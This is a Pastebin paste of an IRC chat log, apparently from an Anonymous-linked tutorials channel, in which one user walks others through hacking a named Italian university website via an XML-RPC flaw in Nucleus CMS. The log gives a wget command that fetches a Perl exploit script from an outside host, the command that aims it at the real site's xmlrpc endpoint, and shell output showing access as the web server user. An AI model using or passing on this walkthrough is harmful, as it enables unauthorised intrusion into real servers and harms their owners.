Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- irc.anonops.li - #bhlynx - #tutorials - sql
- How to exploit a site with XML bug?
- <&sql> First of all you need to have installed perl on ur OS, if you don't have use activeperl for windows, if u re using linux it's a better thing
- <&sql> after it
- <&sql> download this source code to ur pc
- <&sql> wget http://theinvite.info/stuff/sqlxml.txt
- <&sql> if u re using linux then use wget :)
- <&sql> on win do it manually copy/paste to sqlxml.txt
- <&sql> now lets go on
- <&sql> to the funniest thing
- <&sql> search ur sqlml.txt throught ur activeperl promt
- <&sql> or linux console
- <&sql> cd whatever
- <&sql> now
- <&sql> put this command when you have found it
- <&sql> perl sqlxml.txt http://www.luiss.it/siti//nucleus/xmlrpc/server.php
- <&sql> after that, try this command
- <&sql> uname -a; id
- <&sql> sql-shell@#uname -a;id
- <&sql> SunOS marte 5.10 Generic_138888-08 sun4u sparc SUNW,Sun-Fire-V245
- <&sql> uid=80(webservd) gid=80(webservd)
- <&sql> sql-shell@#who -r
- <&sql> . run-level 3 set 13 08:20 3 0 S
- <&sql> sql-shell@#date; logname
- <&sql> martedì 5 luglio 2011 13:53:33 CEST
- <&sql> welcome u re in luiss.it
- <&sql> that re the basic things how to get into hosts which have a vun. bug in xml.
- <&sql> :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement